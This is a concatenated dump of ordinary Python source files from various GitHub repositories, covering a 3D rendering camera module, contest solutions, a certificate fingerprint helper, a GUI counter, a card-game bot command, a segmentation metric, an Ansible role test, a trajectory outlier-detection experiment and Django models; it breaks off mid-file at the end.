@ti.func\n def inverse(self):\n # TODO: incorrect:\n return Affine(self.matrix.inverse(), -self.offset)\n\n def loadOrtho(self, fwd=[0, 0, 1], up=[0, 1, 0]):\n # fwd = target - pos\n # fwd = fwd.normalized()\n fwd_len = math.sqrt(sum(x**2 for x in fwd))\n fwd = [x / fwd_len for x in fwd]\n # right = fwd.cross(up)\n right = [\n fwd[2] * up[1] - fwd[1] * up[2],\n fwd[0] * up[2] - fwd[2] * up[0],\n fwd[1] * up[0] - fwd[0] * up[1],\n ]\n # right = right.normalized()\n right_len = math.sqrt(sum(x**2 for x in right))\n right = [x / right_len for x in right]\n # up = right.cross(fwd)\n up = [\n right[2] * fwd[1] - right[1] * fwd[2],\n right[0] * fwd[2] - right[2] * fwd[0],\n right[1] * fwd[0] - right[0] * fwd[1],\n ]\n\n # trans = ti.Matrix.cols([right, up, fwd])\n trans = [right, up, fwd]\n trans = [[trans[i][j] for i in range(3)] for j in range(3)]\n self.matrix[None] = trans\n\n def from_mouse(self, mpos):\n if isinstance(mpos, ti.GUI):\n if mpos.is_pressed(ti.GUI.LMB):\n mpos = mpos.get_cursor_pos()\n else:\n mpos = (0, 0)\n a, t = mpos\n if a != 0 or t != 0:\n a, t = a * math.tau - math.pi, t * math.pi - math.pi / 2\n c = math.cos(t)\n self.loadOrtho(fwd=[c * math.sin(a), math.sin(t), c * math.cos(a)])\n\n\n@ti.data_oriented\nclass Camera(AutoInit):\n ORTHO = 'Orthogonal'\n TAN_FOV = 'Tangent Perspective' # rectilinear perspective\n COS_FOV = 'Cosine Perspective' # curvilinear perspective, see en.wikipedia.org/wiki/Curvilinear_perspective\n\n def __init__(self, res=None, fx=None, fy=None, cx=None, cy=None,\n pos=[0, 0, -2], target=[0, 0, 0], up=[0, 1, 0], fov=30):\n self.res = res or (512, 512)\n self.img = ti.Vector.field(3, ti.f32, self.res)\n self.zbuf = ti.field(ti.f32, self.res)\n self.mask = ti.Vector.var(3, ti.f32, self.res)\n self.normal_map = ti.Vector.var(3, ti.f32, self.res)\n self.trans = ti.Matrix.field(3, 3, ti.f32, ())\n self.pos = ti.Vector.field(3, ti.f32, ())\n self.target = ti.Vector.field(3, ti.f32, ())\n self.intrinsic = ti.Matrix.field(3, 3, ti.f32, ())\n self.type = self.TAN_FOV\n self.fov = math.radians(fov)\n\n self.cx = cx or self.res[0] // 2\n self.cy = cy or self.res[1] // 2\n self.fx = fx or self.cx / math.tan(self.fov)\n self.fy = fy or self.cy / math.tan(self.fov)\n # python scope camera transformations\n self.pos_py = pos\n self.target_py = target\n self.trans_py = None\n self.up_py = up\n self.set(init=True)\n # mouse position for camera control\n self.mpos = (0, 0)\n\n def set_intrinsic(self, fx=None, fy=None, cx=None, cy=None):\n # see http://ais.informatik.uni-freiburg.de/teaching/ws09/robotics2/pdfs/rob2-08-camera-calibration.pdf\n self.fx = fx or self.fx\n self.fy = fy or self.fy\n self.cx = self.cx if cx is None else cx\n self.cy = self.cy if cy is None else cy\n\n '''\n NOTE: taichi_three uses a LEFT HANDED coordinate system.\n that is, the +Z axis points FROM the camera TOWARDS the scene,\n with X, Y being device coordinates\n '''\n def set(self, pos=None, target=None, up=None, init=False):\n pos = self.pos_py if pos is None else pos\n target = self.target_py if target is None else target\n up = self.up_py if up is None else up\n # fwd = target - pos\n fwd = [target[i] - pos[i] for i in range(3)]\n # fwd = fwd.normalized()\n fwd_len = math.sqrt(sum(x**2 for x in fwd))\n fwd = [x / fwd_len for x in fwd]\n # right = fwd.cross(up) \n right = [\n fwd[2] * up[1] - fwd[1] * up[2],\n fwd[0] * up[2] - fwd[2] * up[0],\n fwd[1] * up[0] - fwd[0] * up[1],\n ]\n # right = right.normalized()\n right_len = math.sqrt(sum(x**2 for x in right))\n right = [x / right_len 
for x in right]\n # up = right.cross(fwd)\n up = [\n right[2] * fwd[1] - right[1] * fwd[2],\n right[0] * fwd[2] - right[2] * fwd[0],\n right[1] * fwd[0] - right[0] * fwd[1],\n ]\n\n # trans = ti.Matrix.cols([right, up, fwd])\n trans = [right, up, fwd]\n self.trans_py = [[trans[i][j] for i in range(3)] for j in range(3)]\n self.pos_py = pos\n self.target_py = target\n if not init:\n self.pos[None] = self.pos_py\n self.trans[None] = self.trans_py\n self.target[None] = self.target_py\n\n def set_extrinsic(self, trans, pose):\n trans = [[trans[i][j] for j in range(3)] for i in range(3)]\n self.trans_py = trans\n self.pos_py = pose\n\n def _init(self):\n self.pos[None] = self.pos_py\n self.trans[None] = self.trans_py\n self.target[None] = self.target_py\n self.intrinsic[None][0, 0] = self.fx\n self.intrinsic[None][0, 2] = self.cx\n self.intrinsic[None][1, 1] = self.fy\n self.intrinsic[None][1, 2] = self.cy\n self.intrinsic[None][2, 2] = 1.0\n\n @ti.func\n def clear_buffer(self):\n for I in ti.grouped(self.img):\n self.img[I] = ts.vec3(0.0)\n self.zbuf[I] = 0.0\n self.mask[I] = ts.vec3(0.0)\n self.normal_map[I] = ts.vec3(0.5)\n\n def from_mouse(self, gui):\n is_alter_move = gui.is_pressed(ti.GUI.CTRL)\n if gui.is_pressed(ti.GUI.LMB):\n mpos = gui.get_cursor_pos()\n if self.mpos != (0, 0):\n self.orbit((mpos[0] - self.mpos[0], mpos[1] - self.mpos[1]),\n pov=is_alter_move)\n self.mpos = mpos\n elif gui.is_pressed(ti.GUI.RMB):\n mpos = gui.get_cursor_pos()\n if self.mpos != (0, 0):\n self.zoom_by_mouse(mpos, (mpos[0] - self.mpos[0], mpos[1] - self.mpos[1]),\n dolly=is_alter_move)\n self.mpos = mpos\n elif gui.is_pressed(ti.GUI.MMB):\n mpos = gui.get_cursor_pos()\n if self.mpos != (0, 0):\n self.pan((mpos[0] - self.mpos[0], mpos[1] - self.mpos[1]))\n self.mpos = mpos\n else:\n if gui.event and gui.event.key == ti.GUI.WHEEL:\n # one mouse wheel unit is (0, 120)\n self.zoom(-gui.event.delta[1] / 1200,\n dolly=is_alter_move)\n gui.event = None\n mpos = (0, 0)\n self.mpos = mpos\n\n\n def orbit(self, delta, sensitivity=5, pov=False):\n ds, dt = delta\n if ds != 0 or dt != 0:\n dis = math.sqrt(sum((self.target_py[i] - self.pos_py[i]) ** 2 for i in range(3)))\n fov = self.fov\n ds, dt = ds * fov * sensitivity, dt * fov * sensitivity\n newdir = ts.vec3(ds, dt, 1).normalized()\n newdir = [sum(self.trans[None][i, j] * newdir[j] for j in range(3))\\\n for i in range(3)]\n if pov:\n newtarget = [self.pos_py[i] + dis * newdir[i] for i in range(3)]\n self.set(target=newtarget)\n else:\n newpos = [self.target_py[i] - dis * newdir[i] for i in range(3)]\n self.set(pos=newpos)\n\n def zoom_by_mouse(self, pos, delta, sensitivity=3, dolly=False):\n ds, dt = delta\n if ds != 0 or dt != 0:\n z = math.sqrt(ds ** 2 + dt ** 2) * sensitivity\n if (pos[0] - 0.5) * ds + (pos[1] - 0.5) * dt > 0:\n z *= -1\n self.zoom(z, dolly)\n \n def zoom(self, z, dolly=False):\n newpos = [(1 + z) * self.pos_py[i] - z * self.target_py[i] for i in range(3)]\n if dolly:\n newtarget = [z * self.pos_py[i] + (1 - z) * self.target_py[i] for i in range(3)]\n self.set(pos=newpos, target=newtarget)\n else:\n self.set(pos=newpos)\n\n def pan(self, delta, sensitivity=3):\n ds, dt = delta\n if ds != 0 or dt != 0:\n dis = math.sqrt(sum((self.target_py[i] - self.pos_py[i]) ** 2 for i in range(3)))\n fov = self.fov\n ds, dt = ds * fov * sensitivity, dt * fov * sensitivity\n newdir = ts.vec3(-ds, -dt, 1).normalized()\n newdir = [sum(self.trans[None][i, j] * newdir[j] for j in range(3))\\\n for i in range(3)]\n newtarget = [self.pos_py[i] + dis * newdir[i] 
for i in range(3)]\n newpos = [self.pos_py[i] + newtarget[i] - self.target_py[i] for i in range(3)]\n self.set(pos=newpos, target=newtarget)\n\n @ti.func\n def trans_pos(self, pos):\n return self.trans[None] @ pos + self.pos[None]\n\n @ti.func\n def trans_dir(self, pos):\n return self.trans[None] @ pos\n\n @ti.func\n def untrans_pos(self, pos):\n return self.trans[None].inverse() @ (pos - self.pos[None])\n\n @ti.func\n def untrans_dir(self, pos):\n return self.trans[None].inverse() @ pos\n \n @ti.func\n def uncook(self, pos):\n if ti.static(self.type == self.ORTHO):\n pos[0] *= self.intrinsic[None][0, 0] \n pos[1] *= self.intrinsic[None][1, 1]\n pos[0] += self.intrinsic[None][0, 2]\n pos[1] += self.intrinsic[None][1, 2]\n elif ti.static(self.type == self.TAN_FOV):\n pos = self.intrinsic[None] @ pos\n pos[0] /= abs(pos[2])\n pos[1] /= abs(pos[2])\n else:\n raise NotImplementedError(\"Curvilinear projection matrix not implemented!\")\n return ts.vec2(pos[0], pos[1])\n\n def export_intrinsic(self):\n import numpy as np\n intrinsic = np.zeros((3, 3))\n intrinsic[0, 0] = self.fx\n intrinsic[1, 1] = self.fy\n intrinsic[0, 2] = self.cx\n intrinsic[1, 2] = self.cy\n intrinsic[2, 2] = 1\n return intrinsic\n\n def export_extrinsic(self):\n import numpy as np\n trans = np.array(self.trans_py)\n pos = np.array(self.pos_py)\n extrinsic = np.zeros((3, 4))\n\n trans = np.transpose(trans)\n for i in range(3):\n for j in range(3):\n extrinsic[i][j] = trans[i, j]\n pos = -trans @ pos\n for i in range(3):\n extrinsic[i][3] = pos[i]\n return extrinsic\n\n @ti.func\n def generate(self, coor):\n fov = ti.static(self.fov)\n tan_fov = ti.static(math.tan(fov))\n\n orig = ts.vec3(0.0)\n dir = ts.vec3(0.0, 0.0, 1.0)\n\n if ti.static(self.type == self.ORTHO):\n orig = ts.vec3(coor, 0.0)\n elif ti.static(self.type == self.TAN_FOV):\n uv = coor * fov\n dir = ts.normalize(ts.vec3(uv, 1))\n elif ti.static(self.type == self.COS_FOV):\n uv = coor * fov\n dir = ts.vec3(ti.sin(uv), ti.cos(uv.norm()))\n\n orig = self.trans_pos(orig)\n dir = self.trans_dir(dir)\n\n return orig, dir\n","repo_name":"DSaurus/DiffuStereo","sub_path":"taichi_render_gpu/taichi_three/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":12440,"program_lang":"python","lang":"en","doc_type":"code","stars":172,"dataset":"github-code","pt":"53"} +{"seq_id":"5296223958","text":"T = int(input())\nfor _ in range(T):\n players = int(input())\n goals = map(int,input().split())\n penalties = map(int, input().split())\n \n score = lambda x: x*20\n foul = lambda x: x*-10\n \n max_point = -500\n\n score_goals = list(map(score, goals))\n foul_penalties = list(map(foul, penalties))\n\n for i in range(players):\n player = score_goals[i] + foul_penalties[i]\n if player > max_point:\n max_point = player\n if max_point >= 0:\n print(max_point)\n else:\n print(0)","repo_name":"Udit107710/CompetitiveCoding","sub_path":"CodeChef/MSNSADM1/solutions.py","file_name":"solutions.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9693136520","text":"Cases = int(input())\n\ndef solve(a, d):\n N = len(a)\n if (N == 0):\n return ''\n zeros = [-1]\n for i in range(N):\n if (a[i] == d):\n zeros.append(i)\n zeros.append(N)\n M = len(zeros)\n ret = ''\n for i in range(1, M):\n if (zeros[i] > zeros[i - 1] + 1):\n ret += (\"(\" + solve(a[zeros[i-1] + 1 : zeros[i]], d + 1) + \")\")\n if (i < M - 1):\n ret += str(a[zeros[i]])\n return ret\n \n\nfor T in range(1, 
Cases + 1):\n    s = list(map(int, list(input())))\n    N = len(s)\n    print(\"Case #{}: \".format(T), solve(s, 0))","repo_name":"heyshb/Competitive-Programming","sub_path":"CodeJam/2020Qual/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"19083097996","text":"import base64\nimport hashlib\nfrom collections import namedtuple\n\n\nPEM_BEGIN_MARK = b'-----BEGIN CERTIFICATE-----'\nPEM_END_MARK = b'-----END CERTIFICATE-----'\n\nFingerprint = namedtuple('Fingerprint', 'sha1, sha256')\n\ndef get_fingerprint(pem_path):\n    \"\"\"Return (sha1, sha256) fingerprint of PEM cert.\"\"\"\n    lines = []\n    with open(pem_path, 'rb') as pem:\n        for line in pem:\n            if line.rstrip() == PEM_BEGIN_MARK:\n                break\n        for line in pem:\n            if line.rstrip() == PEM_END_MARK:\n                break\n            lines.append(line.strip())\n    if not lines:\n        raise IOError('not a valid PEM file')\n    der = base64.decodebytes(b''.join(lines))\n    sha1 = hashlib.sha1(der).digest()\n    sha256 = hashlib.sha256(der).digest()\n    return Fingerprint(sha1, sha256)\n\n","repo_name":"sorz/sstp-server","sub_path":"sstpd/certtool.py","file_name":"certtool.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":238,"dataset":"github-code","pt":"53"}
{"seq_id":"23356531569","text":"from tkinter import *\nimport time\nroot = Tk()\nroot.title(\"CATS\")\nroot.geometry(\"100x100\")\nroot.resizable(width=True,height=True)\nroot.configure(bg=\"snow\")\ncase = IntVar()\ncats = StringVar()\ndogs = False\ndef stop():\n    global dogs\n    dogs = False\n    root.update()\ndef does():\n    global dogs\n    case=0\n    dogs = True\n    while dogs:  # stop() clears this flag to end the loop\n        cats.set(case)\n        root.update()\n        time.sleep(1)\n        case = case + 1\n\nbuttonStart = Button(root,text = \"start\",command = does)\nbuttonStart.pack(side=BOTTOM)\nbuttonStart = Button(root,text = \"stop\",command = stop)\nbuttonStart.pack(side=BOTTOM)\nscreen = Label(root,textvariable = cats,relief = RIDGE)\nscreen.pack()\n\n\n\n\n\nroot.mainloop()\n","repo_name":"xanderrp2/RandomPractice","sub_path":"cats.i.think.py","file_name":"cats.i.think.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"6263504877","text":"from .runner import Runner\nimport database\nimport json\nfrom numbers import Number\n\n\nclass GiveCommand(Runner):\n\n    def __init__(self, client, server, message, sender, args):\n        super().__init__(client, server, message, sender, args)\n        self.name = \"give_command\"\n\n    def do(self):\n        super().do()\n        if int(self.sender.id) != 223212153207783435:\n            return f\"{self.sender.mention} isn't allowed to do that :D\"\n        if len(self.args) == 1:\n            card_id = int(self.args[0])\n            if database.add_card(self.sender, card_id):\n                return f\"Transaction completed: you added {database.get_card_by_id(card_id)} to your cards\"\n            else:\n                return \"forgot to do !start\"\n        else:\n            return f\"command {self.name} has too many or too few arguments ( {self.args})\"\n","repo_name":"lordraindance2/cardgame","sub_path":"commands/give.py","file_name":"give.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"41533714254","text":"# -*- coding: utf-8 -*-\r\n\r\nimport numpy as np\r\n\r\ndef metric_iou_dice(prediction, target):\r\n    # [tile_counts, tile_size, nb_classes]\r\n    # prediction = np.zeros(logits.shape)\r\n    # 
prediction[np.where(np.greater_equal(logits, threshold))] = 1\r\n inte = np.sum(target * prediction)\r\n union = np.sum(target) + np.sum(prediction) - inte\r\n\r\n iou = float(inte) / (float(union)+ 0.001)\r\n\r\n l = np.sum(target * target)\r\n r = np.sum(prediction * prediction)\r\n dice = (2 * inte) / (l + r+0.0001)\r\n return iou, dice\r\n","repo_name":"YingChen7/A-SegAN","sub_path":"metric.py","file_name":"metric.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"16220704014","text":"import pytest\n\n\n@pytest.mark.parametrize(\n \"name\",\n [\n (\"unattended-upgrades\"),\n ],\n)\ndef test_packages_are_installed(host, name):\n package = host.package(name)\n assert package.is_installed\n\n\n@pytest.mark.parametrize(\n \"file,user,group,mode\",\n [\n (\"20auto-upgrades\", \"root\", \"root\", 0o644),\n (\"50unattended-upgrades\", \"root\", \"root\", 0o644),\n ],\n)\ndef test_config_files_exist(host, file, user, group, mode):\n config = host.file(\"/etc/apt/apt.conf.d/\" + file)\n assert config.exists\n assert config.is_file\n assert config.user == user\n assert config.group == group\n assert config.mode == mode\n","repo_name":"boutetnico/ansible-role-unattended-upgrades","sub_path":"molecule/default/tests/test_role.py","file_name":"test_role.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39792119530","text":"from math import ceil\nimport os\nfrom GSP import GSPModule\nfrom Utils import average_length_of_sequences, distance_of_trajectory\nfrom CustomScaler import Scaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import SVC\nfrom sklearn.cluster import DBSCAN\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import f1_score, accuracy_score, confusion_matrix\nimport numpy as np\nimport pickle\nimport argparse\nfrom fastdtw import fastdtw\nfrom scipy.spatial.distance import euclidean\nfrom hilbertcurve.hilbertcurve import HilbertCurve\nfrom time import perf_counter\nfrom numba import njit\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\n@njit\ndef hausdorff_dist(A, B):\n dist = np.float32(-1.0)\n for a in A:\n minimum = np.float32(10000.0)\n for b in B:\n d = np.sqrt((a[0] - b[0])**2 + (a[1] - b[1])**2)\n if d < minimum:\n minimum = d\n if minimum > dist:\n dist = minimum\n return dist\n\n\ndef calculate_distances(X, distance_fn, verbose=False):\n distances = np.zeros((len(X), len(X)))\n hilbert = HilbertCurve(8, 2)\n\n for i in range(len(X)):\n X[i] = np.array(X[i])\n for i in range(len(X)):\n if i % 200 == 0 and verbose:\n print(round(100*i/len(X), 1), \"%\")\n for j in range(i + 1):\n d = 0\n if distance_fn == \"hausdorff\":\n d = max(hausdorff_dist(X[i], X[j]), hausdorff_dist(X[j], X[i]))\n elif distance_fn == \"dtw\":\n d, _ = fastdtw(X[i], X[j], dist=euclidean)\n elif distance_fn == \"dtw_hilbert\":\n xh = hilbert.distances_from_points([p for p in X[i]])\n yh = hilbert.distances_from_points([p for p in X[j]])\n d, _ = fastdtw(xh, yh, dist=lambda p1, p2: abs(p1-p2))\n else:\n raise Exception(\"Incorrect distance metric\")\n distances[i, j] = d\n distances[j, i] = d\n return distances\n\n\nparser = argparse.ArgumentParser(\n description=\"Compare performance of clustering algorithms.\")\nparser.add_argument(\"--dataset\",\n help=\"Specify the dataset to use\",\n 
default=\"geolife\")\nparser.add_argument(\"--G\", help=\"Specify the grid size\", default=\"40\")\nparser.add_argument(\"--eps\", help=\"Specify the eps\", default=\"1.5\")\nparser.add_argument(\n \"--minPts\", help=\"The DBSCAN minPts parameter.\", default=\"2\")\nparser.add_argument(\n \"--distance_fn\", help=\"The distance function used for the path clustering method (hausdorff, dtw or dtw_hilbert)\", default=\"hausdorff\")\nparser.add_argument(\"--C\", help=\"The C parameter.\", default=\"8000\")\nparser.add_argument(\"--gamma\", help=\"The gamma parameter.\", default=\"scale\")\nparser.add_argument(\"--kernel\", help=\"The SVM kernel.\", default=\"rbf\")\nparser.add_argument(\"--method\", help=\"clustering, svm, both or bothOr\", default=\"svm\")\nparser.add_argument(\"--do_gsp\", help=\"0 or 1\", default=\"0\")\nparser.add_argument(\"--gsp_support\", default=\"0.05\")\nparser.add_argument(\"--seed\", default=\"999\")\nargs = parser.parse_args()\n\ndataset = args.dataset\ngrid_scale = int(args.G)\neps = float(args.eps)\nminPts = int(args.minPts)\ndistance_fn = args.distance_fn\nC = int(args.C)\ngamma = args.gamma\nkernel = args.kernel\nmethod = args.method\ndo_gsp = bool(int(args.do_gsp))\ngsp_support = float(args.gsp_support)\nseed = int(args.seed)\n\ndata_file = \"trajectories_labeled_\" + dataset + \".pkl\"\ndata = pickle.load(open(data_file, \"rb\"))\n\nmanual_outliers = []\nif dataset == \"cyprus\":\n try:\n manual_outliers = pickle.load(open(\"manual_outliers.pkl\", \"rb\"))\n except:\n pass\n\nX_init = [[p[:2] for p in d[0]] for d in data]\ny = np.array([d[1] for d in data])\n\nx_init_train, x_init_test, y_train, y_test = train_test_split(\n X_init, y, train_size=0.75, random_state=seed)\n\nprint(\"Average length of raw sequences:\", average_length_of_sequences(X_init))\n\nt = perf_counter()\n\nscaler = Scaler()\npoints = []\nfor x in X_init:\n points.extend(x)\nscaler.fit(points)\n\nx_train = [scaler.transform_trajectory(x) for x in x_init_train]\nx_test = [scaler.transform_trajectory(x) for x in x_init_test]\nif dataset == \"cyprus\":\n manual_outliers = [scaler.transform_trajectory(x) for x in manual_outliers]\n\n\ndef calc_features(X, gsp_dists=[], gsp=False, isCoordinates=False):\n feature_list = []\n # FEATURES: MAYBE ADD TRIP TIME\n for i, x in enumerate(X):\n features = [x[0][0], x[0][1], x[-1][0], x[-1][1],\n distance_of_trajectory(np.array(x), isCoordinates=isCoordinates)]\n if gsp:\n features.append(gsp_dists[i])\n feature_list.append(features)\n return feature_list\n\n\nx_train_features = np.array(calc_features(x_init_train, isCoordinates=True))\nminmax_values = [(np.min(x_train_features[:, j]), np.max(\n x_train_features[:, j])) for j in range(5)]\n\npickle.dump(minmax_values, open(dataset+\"_minmax.pkl\", \"wb\"))\n\nX_grid_train = []\nX_grid_test = []\nX_grid_manual = []\nfor x in x_train:\n X_grid_train.append(scaler.trajectory_to_grid(x, grid_scale))\nprint(\"Average length of size \" + str(grid_scale) + \" grid cell sequences:\",\n average_length_of_sequences(X_grid_train))\n\ngsp = GSPModule()\nif method in [\"svm\", \"both\", \"bothOr\"] and do_gsp:\n gsp.find_frequent_subsequences(\n X_grid_train+X_grid_test+X_grid_manual, gsp_support, False)\n\nfor x in x_test:\n X_grid_test.append(scaler.trajectory_to_grid(x, grid_scale))\n\nfor x in manual_outliers:\n X_grid_manual.append(scaler.trajectory_to_grid(x, grid_scale))\n\n\ndef sample_trajectory(X, n):\n X = np.array(X)\n sampled = X[[round(i) for i in np.linspace(0, len(X)-1, num=n)]]\n return 
sampled.tolist()\n\n\nif method in [\"clustering\", \"both\", \"bothOr\"]:\n if distance_fn == \"dtw\" or distance_fn == \"dtw_hilbert\":\n samples = ceil(average_length_of_sequences(X_grid_train)) + 1\n X_grid_train = [sample_trajectory(x, samples) if len(\n x) > samples else x for x in X_grid_train]\n X_grid_test = [sample_trajectory(x, samples) if len(\n x) > samples else x for x in X_grid_test]\n X_grid_manual = [sample_trajectory(x, samples) if len(\n x) > samples else x for x in X_grid_manual]\n\n distances = []\n\n try:\n distances = pickle.load(\n open(dataset+'_'+distance_fn+'_'+'distances.pkl', 'rb'))\n except:\n distances = calculate_distances(\n X_grid_train+X_grid_test+X_grid_manual, distance_fn, verbose=False)\n pickle.dump(distances, open(\n dataset+'_'+distance_fn+'_'+'distances.pkl', 'wb'))\n\n distances_train = distances[:len(X_grid_train), :len(X_grid_train)]\n\n dbscan = DBSCAN(eps=eps, metric=\"precomputed\",\n n_jobs=-1, min_samples=minPts)\n labels_train = dbscan.fit_predict(distances_train)\n\n distances_test_pred = distances[len(X_grid_train):len(\n X_grid_train)+len(X_grid_test), :len(X_grid_train)]\n distances_manual_pred = distances[len(\n X_grid_train)+len(X_grid_test):, :len(X_grid_train)]\n labels_test = [labels_train[np.argmin(\n distances_test_pred[i])] for i in range(len(X_grid_test))]\n labels_manual = [labels_train[np.argmin(\n distances_manual_pred[i])] for i in range(len(X_grid_manual))]\n\n y_pred_train1 = np.array([1 if l == -1 else 0 for l in labels_train])\n y_pred_test1 = np.array([1 if l == -1 else 0 for l in labels_test])\n y_pred_manual1 = np.array([1 if l == -1 else 0 for l in labels_manual])\n print(\"Finished path clustering\")\n\nif method in [\"svm\", \"both\", \"bothOr\"]:\n gsp_dists_train = []\n gsp_dists_test = []\n gsp_dists_manual = []\n if do_gsp:\n gsp_dists_train = gsp.deviation_from_frequent(X_grid_train)\n gsp_dists_test = gsp.deviation_from_frequent(X_grid_test)\n gsp_dists_manual = gsp.deviation_from_frequent(X_grid_manual)\n\n X_features_train = calc_features(x_train, gsp_dists_train, do_gsp)\n X_features_test = calc_features(x_test, gsp_dists_test, do_gsp)\n X_features_manual = calc_features(\n manual_outliers, gsp_dists_manual, do_gsp)\n\n minmax = MinMaxScaler()\n X_features_train = minmax.fit_transform(X_features_train)\n X_features_test = minmax.transform(X_features_test)\n if dataset == \"cyprus\":\n X_features_manual = minmax.transform(X_features_manual)\n\n svm = SVC(C=C, gamma=gamma, kernel=kernel)\n svm.fit(X_features_train, y_train)\n y_pred_train2 = svm.predict(X_features_train)\n y_pred_test2 = svm.predict(X_features_test)\n if dataset == \"cyprus\":\n y_pred_manual2 = svm.predict(X_features_manual)\n\n print(\"Finished feature training\")\n\nif method == \"both\":\n y_pred_train_concat = np.concatenate(\n (y_pred_train1.reshape((-1, 1)), y_pred_train2.reshape((-1, 1))), axis=1)\n y_pred_test_concat = np.concatenate(\n (y_pred_test1.reshape((-1, 1)), y_pred_test2.reshape((-1, 1))), axis=1)\n if dataset == \"cyprus\":\n y_pred_manual_concat = np.concatenate(\n (y_pred_manual1.reshape((-1, 1)), y_pred_manual2.reshape((-1, 1))), axis=1)\n logreg = LogisticRegression()\n logreg.fit(y_pred_train_concat, y_train)\n y_pred_train = logreg.predict(y_pred_train_concat)\n y_pred_test = logreg.predict(y_pred_test_concat)\n if dataset == \"cyprus\":\n y_pred_manual = logreg.predict(y_pred_manual_concat)\n # print(logreg.coef_)\nelif method == \"bothOr\":\n y_pred_train = np.logical_or(y_pred_train1, 
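The `both` branch above stacks the clustering and SVM outputs and lets a logistic regression meta-classifier learn how much to trust each detector, while `bothOr` simply flags a trajectory when either detector does. A toy sketch of the two combination strategies (synthetic labels, not the experiment's data):

```python
import numpy as np
from sklearn.linear_model import LogisticRegression

# Toy 0/1 outputs of two outlier detectors for five trajectories.
pred_clustering = np.array([0, 1, 0, 1, 0])
pred_svm        = np.array([0, 0, 1, 1, 0])
y_true          = np.array([0, 1, 1, 1, 0])

# "bothOr": union of the two detectors.
union = np.logical_or(pred_clustering, pred_svm).astype(int)

# "both": a learned weighting of the two detectors.
stacked = np.column_stack([pred_clustering, pred_svm])
meta = LogisticRegression().fit(stacked, y_true)
print(union, meta.predict(stacked))
```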
y_pred_train2).astype(int)\n y_pred_test = np.logical_or(y_pred_test1, y_pred_test2).astype(int)\n if dataset == \"cyprus\":\n y_pred_manual = np.logical_or(y_pred_manual1, y_pred_manual2).astype(int)\nelif method == \"clustering\":\n y_pred_train = y_pred_train1\n y_pred_test = y_pred_test1\n if dataset == \"cyprus\":\n y_pred_manual = y_pred_manual1\nelse: # SVM\n y_pred_train = y_pred_train2\n y_pred_test = y_pred_test2\n if dataset == \"cyprus\":\n y_pred_manual = y_pred_manual2\n\nprint(\"Running time:\", round(perf_counter()-t, 1), \"seconds\")\nprint(\"Train accuracy score:\", round(accuracy_score(y_train, y_pred_train), 4))\nprint(\"Train F1 score:\", round(f1_score(y_train, y_pred_train, average=\"macro\"), 4))\nprint(\"Test accuracy score:\", round(accuracy_score(y_test, y_pred_test), 4))\nprint(\"Test F1 score:\", round(f1_score(y_test, y_pred_test, average=\"macro\"), 4))\nprint(confusion_matrix(y_test, y_pred_test))\nif dataset == \"cyprus\" and len(manual_outliers) > 0:\n print(y_pred_manual)\n print(\"Percentage of manual outliers found by the system: {pct}%\".format(\n pct=100*len([y for y in y_pred_manual if y == 1])/len(y_pred_manual)))\n\nif method != \"clustering\":\n output = []\n for i, x in enumerate(x_init_test):\n output.append([X_features_test[i], x_init_test[i], y_pred_test[i]])\n pickle.dump(output, open(\n f\"trajectory_features_labeled_{dataset}.pkl\", \"wb\"))\n","repo_name":"amoavinis/trajectory-outliers","sub_path":"ProposedApproach/Proposed.py","file_name":"Proposed.py","file_ext":"py","file_size_in_byte":10934,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13436242036","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\n\nclass FormModel(models.Model):\n name = models.CharField(max_length=60, verbose_name=u'name form')\n user = models.ForeignKey(User, verbose_name=u'user form')\n created = models.DateField(auto_now_add=True, verbose_name=u'date created')\n description = models.TextField(verbose_name=u'description of form')\n\n def get_absolute_url(self):\n from django.core.urlresolvers import reverse\n\n return reverse('form', args=(self.id, ))\n\n def __unicode__(self):\n return self.name\n\n\nclass ElementForm(models.Model):\n type_element = models.CharField(max_length=20, verbose_name=u'type element form')\n label = models.CharField(max_length=60, verbose_name=u'label element')\n description = models.CharField(max_length=120, verbose_name=u'description element')\n width = models.IntegerField(verbose_name=u'width element')\n name = models.CharField(max_length=20, verbose_name=u'name element')\n type_input = models.CharField(max_length=20, verbose_name=u'type input', default='-')\n options = models.TextField(verbose_name=u'options select')\n number = models.IntegerField(verbose_name=u'number element', default=-1)\n form = models.ForeignKey(FormModel, verbose_name=u'form of element')\n\n\n def __unicode__(self):\n return u'%s type: %s' % (self.form.name, self.type_element)","repo_name":"DmitryDmitrienko/kube-form-editor","sub_path":"editorform/editor/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"61182746","text":"import random\nfrom datetime import datetime, timedelta\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\nimport pandas as pd\nimport requests\n\n\n\nclass 
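The evaluation block above reports macro-averaged F1 alongside accuracy, which matters when outliers are rare: accuracy can look high even if every outlier is missed. A minimal reminder of what those sklearn calls return, on toy labels:

```python
from sklearn.metrics import accuracy_score, f1_score, confusion_matrix

y_true = [0, 0, 0, 1, 1]
y_pred = [0, 0, 1, 1, 0]

print(accuracy_score(y_true, y_pred))             # 0.6
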